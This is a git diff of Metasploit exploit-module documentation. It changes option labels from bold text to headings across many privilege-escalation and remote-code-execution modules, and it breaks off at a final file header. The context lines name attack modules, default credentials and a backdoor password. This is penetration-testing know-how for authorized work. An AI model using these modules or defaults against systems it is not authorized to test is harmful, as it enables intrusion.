a/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md b/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md index 46f59b090d9d6..9f64e427dd7c3 100644 --- a/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md +++ b/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md @@ -44,11 +44,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md b/documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md index b0c08e53b016b..da9cfc6563c00 100644 --- a/documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md @@ -27,7 +27,7 @@ This module was not tested against, but may work against: ## Options - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp diff --git a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md index 5b7910cade9cd..9b207880fc4e9 100755 --- a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **SUID_PATH** +### SUID_PATH Path to `omniresolve` executable (default: `/opt/omni/lbin/omniresolve`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md b/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md index d069bd7eef0b8..dad55179d658e 100644 --- a/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md +++ b/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md @@ -28,11 +28,11 @@ Untested against ## Options - **COMPILE** +### COMPILE If we should attempt to compile on the system. Defaults to Auto, which checks if `gcc` is installed - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp diff --git a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md index 29c29a8cccda4..1a3c9288f8802 100644 --- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md +++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md @@ -38,16 +38,16 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu ## Options -**SESSION** +### SESSION The session to run this module on. -**USERNAME** +### USERNAME The name of the user the exploit will add to the system -**PASSWORD** +### PASSWORD The password for the user to be created -**WritableDir** +### WritableDir Directory to write file to (`%TEMP%` by default). ## Scenarios diff --git a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md index 559ec0f174355..b7d5c2205017d 100644 --- a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md @@ -29,15 +29,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **TIMEOUT** +### TIMEOUT Process injection timeout (seconds) (default: `30`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md b/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md index c6f7c36efacd3..8d8f8654076d4 100644 --- a/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md +++ b/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md @@ -51,11 +51,11 @@ some environments. ## Options - **WritableDir** +### WritableDir A folder we can write files to. Defaults to `/tmp` - **COMPILE** +### COMPILE If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` diff --git a/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md b/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md index 30a628325b4b8..0c6f0a9238ecb 100644 --- a/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md +++ b/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md @@ -38,15 +38,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md b/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md index 104a067b5f887..3f6c48c359510 100644 --- a/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md +++ b/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md @@ -26,15 +26,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md b/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md index bd845464ce278..ede456aa9a0d2 100644 --- a/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md +++ b/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md @@ -27,11 +27,11 @@ More kernels could be added to this, just need the proper offsets. ## Options - **COMPILE** +### COMPILE If we should attempt to compile live on the system, or drop a binary. Default is `auto` which will compile if `gcc` is installed. - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp diff --git a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md index e2666e70f6567..16c2039c08ea9 100644 --- a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md +++ b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md @@ -30,11 +30,11 @@ ## Options - **REPTILE_CMD_PATH** +### REPTILE_CMD_PATH Path to `reptile_cmd` executable (default: `/reptile/reptile_cmd`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md b/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md index 804c49dd68128..4fc2f71cb51f9 100644 --- a/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md +++ b/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **SERVU_PATH** +### SERVU_PATH Path to `Serv-U` executable (default: `/usr/local/Serv-U/Serv-U`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/sock_sendpage.md b/documentation/modules/exploit/linux/local/sock_sendpage.md index af9d5d55f181b..57133dffbf64d 100644 --- a/documentation/modules/exploit/linux/local/sock_sendpage.md +++ b/documentation/modules/exploit/linux/local/sock_sendpage.md @@ -36,15 +36,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **DEBUG_EXPLOIT** +### DEBUG_EXPLOIT Enable exploit debug messages. (default: `false`) diff --git a/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md b/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md index f14ece1001378..4d6f1f263472a 100644 --- a/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md +++ b/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md @@ -31,11 +31,11 @@ ## Options - **STAPRUN_PATH** +### STAPRUN_PATH Path to staprun executable (default: `/usr/bin/staprun`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md b/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md index c7755ee705a70..0fb90b8143a8f 100644 --- a/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md +++ b/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md @@ -27,11 +27,11 @@ To verify SMAP has been disabled, `grep smap /proc/cpuinfo` and nothing should b ## Options - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp - **COMPILE** +### COMPILE If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto diff --git a/documentation/modules/exploit/linux/local/vmware_alsa_config.md b/documentation/modules/exploit/linux/local/vmware_alsa_config.md index a15927105a418..b4d61adab74b5 100644 --- a/documentation/modules/exploit/linux/local/vmware_alsa_config.md +++ b/documentation/modules/exploit/linux/local/vmware_alsa_config.md @@ -32,15 +32,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **Xdisplay** +### Xdisplay Display exploit will attempt to use (default: `:0`) diff --git a/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md b/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md index fe52aa1f8e2f0..4d3eabf3f1e68 100644 --- a/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md +++ b/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md @@ -26,19 +26,19 @@ ## Options - **TelnetPort** +### TelnetPort The port for Telnetd to bind (default: `4444`) - **TelnetTimeout** +### TelnetTimeout The number of seconds to wait for connection to telnet (default: `10`) - **TelnetBannerTimeout** +### TelnetBannerTimeout The number of seconds to wait for the telnet banner (default: `25`) - **CommandShellCleanupCommand** +### CommandShellCleanupCommand A command to run before the session is closed (default: `exit`) diff --git a/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md b/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md index 7163f2021be63..f26d835c6b4e2 100644 --- a/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md +++ b/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md @@ -26,23 +26,23 @@ This vulnerability does not require authentication and only HTTP access to the v ## Options - **RPORT** +### RPORT The http port for the jenkins server. (Defaults to 8080) - **TARGETURI** +### TARGETURI The path to the target instance of Jenkins. (Defaults to /) - **SRVHOST** +### SRVHOST The local address to listen for the LDAP request on. (Defaults to 127.0.0.1) - **SRVPORT** +### SRVPORT The local port to listen for the LDAP request on. (Defaults to 1389) - **LDAPHOST** +### LDAPHOST The ldap host the exploit will connect to. Can be different from ```SRVHOST``` if in a environment where there is port forwarding. (Defaults to 127.0.0.1) diff --git a/documentation/modules/exploit/linux/misc/qnap_transcode_server.md b/documentation/modules/exploit/linux/misc/qnap_transcode_server.md index 2c1abef17f641..9d2ed3827d0cb 100644 --- a/documentation/modules/exploit/linux/misc/qnap_transcode_server.md +++ b/documentation/modules/exploit/linux/misc/qnap_transcode_server.md @@ -22,7 +22,7 @@ ## Options - **Delay** +### Delay How long to wait (in seconds) for the device to download the payload. diff --git a/documentation/modules/exploit/linux/samba/is_known_pipename.md b/documentation/modules/exploit/linux/samba/is_known_pipename.md index 0757631b876e3..4289c094d5068 100644 --- a/documentation/modules/exploit/linux/samba/is_known_pipename.md +++ b/documentation/modules/exploit/linux/samba/is_known_pipename.md @@ -58,12 +58,12 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo ## Options - **SMB_SHARE_NAME** +### SMB_SHARE_NAME The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this variable is non-blank, it will be preferred. - **SMB_SHARE_BASE** +### SMB_SHARE_BASE The remote filesystem path correlating with the SMB share name. This value is preferred, but other values are brute forced including: @@ -79,7 +79,7 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo 9. /var/samba 10. /tmp/home/home/shared - **SMB_FOLDER** +### SMB_FOLDER The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this variable is non-blank, it will be preferred. diff --git a/documentation/modules/exploit/linux/smtp/apache_james_exec.md b/documentation/modules/exploit/linux/smtp/apache_james_exec.md index c08e12777367b..d8d53e46fb014 100644 --- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md +++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md @@ -20,17 +20,17 @@ __7.__ The payload will connect to the listener if the exploit is successful ## Options - **USERNAME:** The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'. +### USERNAME: The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'. - **PASSWORD:** The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'. +### PASSWORD: The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'. - **ADMINPORT:** The port for Apache James 2.3.2 remote administration tool. By default this is '4555'. +### ADMINPORT: The port for Apache James 2.3.2 remote administration tool. By default this is '4555'. - **RHOSTS:** The IP address of the vulnerable server. +### RHOSTS: The IP address of the vulnerable server. - **RPORT:** The port number of the SMTP service. +### RPORT: The port number of the SMTP service. - **POP3PORT** The port for the POP3 Apache James Service. By default this '110'. +### POP3PORT The port for the POP3 Apache James Service. By default this '110'. ## Scenarios **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction diff --git a/documentation/modules/exploit/linux/smtp/haraka.md b/documentation/modules/exploit/linux/smtp/haraka.md index 70fb38508117d..f32abba6a3e03 100644 --- a/documentation/modules/exploit/linux/smtp/haraka.md +++ b/documentation/modules/exploit/linux/smtp/haraka.md @@ -33,23 +33,23 @@ ## Options - **from_email** +### from_email String used in the SMTP MAILFROM command - **to_email** +### to_email String used in the SMTP MAILTO command - **lhost** +### lhost The address to serve the payload from - **rhost** +### rhost The address or hostname to target - **payload** +### payload Any compatible Metasploit payload diff --git a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md index c7a0cfd2e16ce..ba66399ce817e 100644 --- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md +++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md @@ -16,24 +16,24 @@ ## Options - **FILEPATH** +### FILEPATH The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp. - **COMMUNITY** +### COMMUNITY The read/write community string of the target Net-SNMP service. - **VERSION** +### VERSION The SNMP protocol version. Accepted values are '1' or '2c'. - **CHUNKSIZE** +### CHUNKSIZE The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments, but should hopefully work for all cmdstager flavors Note that cmdstager payloads are modified to allow further escaping, so the values limits may also change between cmdstager flavors. This is possibly related to the following bug: [https://sourceforge.net/p/net-snmp/bugs/2542/]. - **TIMEOUT** +### TIMEOUT Specifies the maximum time to allow SNMP to timeout. - **SHELL** +### SHELL The shell to call for the client. Defaults to '/bin/bash' diff --git a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md index 2d4e2947dc9bd..a706a6fb5c010 100644 --- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md +++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md @@ -38,14 +38,14 @@ Newer devices usually listen on UDP. ## Options -**MAC** +### MAC Set this to the MAC address of the device. You can use `ping` and `arp` to find it. You can leave this blank if you're root. -**USERNAME** +### USERNAME If this is an older device, it'll take the value of `super_username` in `nvram`, which is usually unchanged from `Gearguy`. @@ -55,7 +55,7 @@ usually unchanged from `admin`. You can leave this blank to use the default username. -**PASSWORD** +### PASSWORD If this is an older device, it'll take the value of `super_passwd` in `nvram`, which is usually unchanged from `Geardog`. diff --git a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md index 72bdcdb6effd9..d0f8eab43da91 100644 --- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md +++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md @@ -21,7 +21,7 @@ Id Name ## Options -**RPORT** +### RPORT Set this to the Wemo device's UPnP port. In our testing, this was 49152 for Crock-Pot and 49153 for other devices. diff --git a/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md b/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md index 5155d8b6641bd..20522eea38489 100644 --- a/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md +++ b/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md @@ -22,7 +22,7 @@ or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar ## Options -**VECTOR** +### VECTOR This option denotes which header will be used in the request (UUID or URN) that triggers the vulnerability. diff --git a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md index 98bb8158f528b..dd723da0232c4 100644 --- a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md +++ b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md @@ -53,11 +53,11 @@ Source code and installers: Options unique for this module is described below. - **REMOTE_IP** +### REMOTE_IP IP to target when running inside the victim's browser. - **REMOTE_PORT** +### REMOTE_PORT Remote port the vulnerable service is running at, default is 55554. diff --git a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md index e7b0b70b1de91..397ebdfe27eef 100644 --- a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md +++ b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md @@ -35,7 +35,7 @@ ## Options - **FILENAME** +### FILENAME The cbt document file name (default: `msf.cbt`) diff --git a/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md b/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md index 039338515f7f1..ea589e326dba3 100644 --- a/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md +++ b/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md @@ -29,14 +29,14 @@ Id Name ## Options -**FILENAME** +### FILENAME Set this to the output file's name. Depending on the target environment, the file extension may not matter, so the PS file could be named `msf.pdf`, for instance. This can potentially work around filename filters. -**WritableDir** +### WritableDir Set this to a writable directory without `noexec`. diff --git a/documentation/modules/exploit/multi/fileformat/office_word_macro.md b/documentation/modules/exploit/multi/fileformat/office_word_macro.md index 388ba07383cb7..0d16b2b38ca09 100644 --- a/documentation/modules/exploit/multi/fileformat/office_word_macro.md +++ b/documentation/modules/exploit/multi/fileformat/office_word_macro.md @@ -75,7 +75,7 @@ If you already have Microsoft Office, you can use it to create a docx file and u ## Options -**CUSTOMTEMPLATE** +### CUSTOMTEMPLATE A docx file that will be used as a template to build the exploit. diff --git a/documentation/modules/exploit/multi/hams/steamed.md b/documentation/modules/exploit/multi/hams/steamed.md index 4e6899cd9e3a4..7cb22e4d1960f 100644 --- a/documentation/modules/exploit/multi/hams/steamed.md +++ b/documentation/modules/exploit/multi/hams/steamed.md @@ -15,7 +15,7 @@ this module provides an unforgettable luncheon experience. ## Options - **VERBOSE** +### VERBOSE This option will further enhance the experience. diff --git a/documentation/modules/exploit/multi/http/apache_normalize_path_rce.md b/documentation/modules/exploit/multi/http/apache_normalize_path_rce.md index 47a0d4407492d..319cbde457a2f 100644 --- a/documentation/modules/exploit/multi/http/apache_normalize_path_rce.md +++ b/documentation/modules/exploit/multi/http/apache_normalize_path_rce.md @@ -49,15 +49,15 @@ docker start CVE-2021-42013 ## Options -**CVE** +### CVE The vulnerability to use (Accepted: CVE-2021-41773, CVE-2021-42013). Default: CVE-2021-42013 -**DEPTH** +### DEPTH Depth for path traversal. Default: 5 -**TARGETURI** +### TARGETURI Base path. Default: `/cgi-bin` diff --git a/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md index 8dc500eb541a1..148ed7de18d24 100644 --- a/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md +++ b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md @@ -20,11 +20,11 @@ Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/4306 ## Options - **TARGETURI** +### TARGETURI TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor. - **PASSWORD** +### PASSWORD PASSWORD by default is `chopper`, which is the password of the backdoor. diff --git a/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md b/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md index ae9086b6cb348..f8df802004862 100644 --- a/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md +++ b/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md @@ -35,7 +35,7 @@ Follow Clipbucket Installer Instructions at: ```http://localhost/``` ## Options - **TARGETURI** +### TARGETURI TARGETURI by default is `/`, however it can be changed. diff --git a/documentation/modules/exploit/multi/http/git_submodule_command_exec.md b/documentation/modules/exploit/multi/http/git_submodule_command_exec.md index bb119f36cbb0c..0dfdb3d4dd292 100644 --- a/documentation/modules/exploit/multi/http/git_submodule_command_exec.md +++ b/documentation/modules/exploit/multi/http/git_submodule_command_exec.md @@ -28,11 +28,11 @@ ## Options - **GIT_URI** +### GIT_URI This is the URI the git repository will be hosted from (defaults to random). - **GIT_SUBMODULE** +### GIT_SUBMODULE This is the URI of the submodule within the git repository (defaults to random). The url of this submodule, when cloned, will execute the payload. diff --git a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md index 76443c529c47a..6d9352a721e5d 100644 --- a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md +++ b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md @@ -35,11 +35,11 @@ ## Options - **GIT_URI** +### GIT_URI This is the URI the git repository will be hosted from (defaults to random). - **GIT_SUBMODULE** +### GIT_SUBMODULE This is the URI of the submodule within the git repository (defaults to random). The url of this submodule, when cloned, will execute the payload. diff --git a/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md b/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md index 3f02d636a3adf..730b623bffc3f 100644 --- a/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md +++ b/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md @@ -35,22 +35,22 @@ Id Name ## Options -**RPORT** +### RPORT Set this to the Jenkins port. The default is 8080. -**TARGETURI** +### TARGETURI Set this to the Jenkins base path. The default is `/`. -**SRVPORT** +### SRVPORT Set this to the port on which to serve the payload. Change it from 8080 to something like 8081 if you are testing Jenkins locally on port 8080. This option is valid only for the `Java Dropper` target. -**ForceExploit** +### ForceExploit Set this to `true` to override the `check` result during exploitation. diff --git a/documentation/modules/exploit/multi/http/jenkins_script_console.md b/documentation/modules/exploit/multi/http/jenkins_script_console.md index e801a9b503fe9..25ae31a0acf41 100644 --- a/documentation/modules/exploit/multi/http/jenkins_script_console.md +++ b/documentation/modules/exploit/multi/http/jenkins_script_console.md @@ -29,23 +29,23 @@ ## Options - **TARGETURI** +### TARGETURI The path to the target instance of Jenkins. - **USERNAME** +### USERNAME A username to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication. - **PASSWORD** +### PASSWORD A password to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication and you aren't using an API_TOKEN (see below). - **API_TOKEN** +### API_TOKEN An API token to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require diff --git a/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md b/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md index 0ea20e793ffdb..0e0afd5490a8e 100644 --- a/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md +++ b/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md @@ -21,15 +21,15 @@ Debian Installation: `sudo dpkg --install jenkins_1.642.1_all.deb` ## Options -**TARGETURI** +### TARGETURI The base path to Jenkins application `/` by default -**VHOST** +### VHOST The HTTP server virtual host. You may need to configure this as well, even though it is set as optional. -**The Check Command** +### The Check Command The `jenkins_xstream_deserialize` module comes with a check command that can attempt to check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following: @@ -47,7 +47,7 @@ msf exploit(jenkins_xstream_deserialize) > check [*] 192.168.1.64:8080 The target appears to be vulnerable.. ``` -**Exploiting the Host** +### Exploiting the Host After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS. diff --git a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md index 700dd3ba31213..5d938572cccd9 100644 --- a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md +++ b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md @@ -28,23 +28,23 @@ To set up the vulnerable environment, please do: ## Options - **TARGETURI** +### TARGETURI The MediaWiki base path, the URL path on which MediaWiki is exposed. This is normally `/mediawiki`, `/wiki`, or `/w`. - **UPLOADPATH** +### UPLOADPATH Folder name where MediaWiki stores the uploads, make sure to use a relative path here. For a regular installation this is the `images` folder. This folder needs to be writable by MediaWiki and accessible from the web root. The exploit will try to create a PHP file in this location that will later be called through the web server. - **CLEANUP** +### CLEANUP Set this to true (the default) to unlink the PHP file created by this exploit module. The cleanup code will only be called when the exploit is successful. - **USERNAME** +### USERNAME In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the username of that account here. - **PASSWORD** +### PASSWORD In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the password of that account here. diff --git a/documentation/modules/exploit/multi/http/php_fpm_rce.md b/documentation/modules/exploit/multi/http/php_fpm_rce.md index 8337bb159bd79..6ba601d357fdc 100644 --- a/documentation/modules/exploit/multi/http/php_fpm_rce.md +++ b/documentation/modules/exploit/multi/http/php_fpm_rce.md @@ -64,7 +64,7 @@ configuration provided by the author ## Options - **TARGETURI** +### TARGETURI Path to a PHP page (`/index.php` by default). This must be a valid page. ## Advanced Options diff --git a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md index 249bc9fcabaac..839484a11c8e8 100644 --- a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md +++ b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md @@ -14,7 +14,7 @@ and 4.0.x versions (prior to 4.0.10.16) are affected. ## Options -**DATABASE** +### DATABASE This option specifies the database the module will use when creating a new table as part of the exploit. diff --git a/documentation/modules/exploit/multi/http/processmaker_exec.md b/documentation/modules/exploit/multi/http/processmaker_exec.md index 8af0d4026f7f2..11aa7f958f63f 100644 --- a/documentation/modules/exploit/multi/http/processmaker_exec.md +++ b/documentation/modules/exploit/multi/http/processmaker_exec.md @@ -68,15 +68,15 @@ ## Options - **Username** +### Username The username for a ProcessMaker user (default: `admin`). - **Password** +### Password The password for the ProcessMaker user (default: `admin`). - **Workspace** +### Workspace The ProcessMaker workspace for which the specified user has access (default: `workflow`). diff --git a/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md b/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md index c64eea5794652..2470ac8c38bfc 100644 --- a/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md +++ b/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md @@ -33,11 +33,11 @@ ## Options - **Username** +### Username The username for a ProcessMaker user with Administrator roles (default: `admin`). - **Password** +### Password The password for the ProcessMaker user (default: `admin`). @@ -47,7 +47,7 @@ However; when creating a new workspace a new user with Administrator roles is also created. The default username and password for the new user are `admin` and `admin` respectively. - **Workspace** +### Workspace The ProcessMaker workspace for which the specified user has Administrator roles. (default: `workflow`) diff --git a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md index b44811fe54bf9..652440dcebce4 100644 --- a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md +++ b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md @@ -19,15 +19,15 @@ The module has been tested against qdPM version 9.1 ## Options - **EMAIL** +### EMAIL [Required] The email of the user you want to exploit the software with. The user must NOT be the original Admin (i.e. the account created upon installing qdPM, `admin@your_domain.com`). The original Admin user does not have the same attributes as the other user created later on, and its profile picture cannot be changed. In fact, it has no profile picure nor a `/myAccount` page altogether. If you only have credentials for the original admin, you can always login and create another regular user to run this exploit. Note that users with Admin role are also exploitable, only the one created upon installation is not. - **PASSWORD** +### PASSWORD [Required] The password of the user you are trying to exploit. - **TARGETURI** +### TARGETURI The path qdPM lives at. This is only needed is qdPM is not served from the webserver root folder. ## Scenarios @@ -108,4 +108,4 @@ systemctl reload nginx.service ``` If the script runs successfully, you should have a webserver serving the application on port 80. -Visit the website to complete the installation via the web installer. It will ask you to fill in the database name, user, and password. Those will be `qdpm_db`, `user`, and `pass` respectively. Then, create a password for your `admin@localhost.com` account and login with it. You can now create a second user to run the exploit against. \ No newline at end of file +Visit the website to complete the installation via the web installer. It will ask you to fill in the database name, user, and password. Those will be `qdpm_db`, `user`, and `pass` respectively. Then, create a password for your `admin@localhost.com` account and login with it. You can now create a second user to run the exploit against. diff --git a/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md 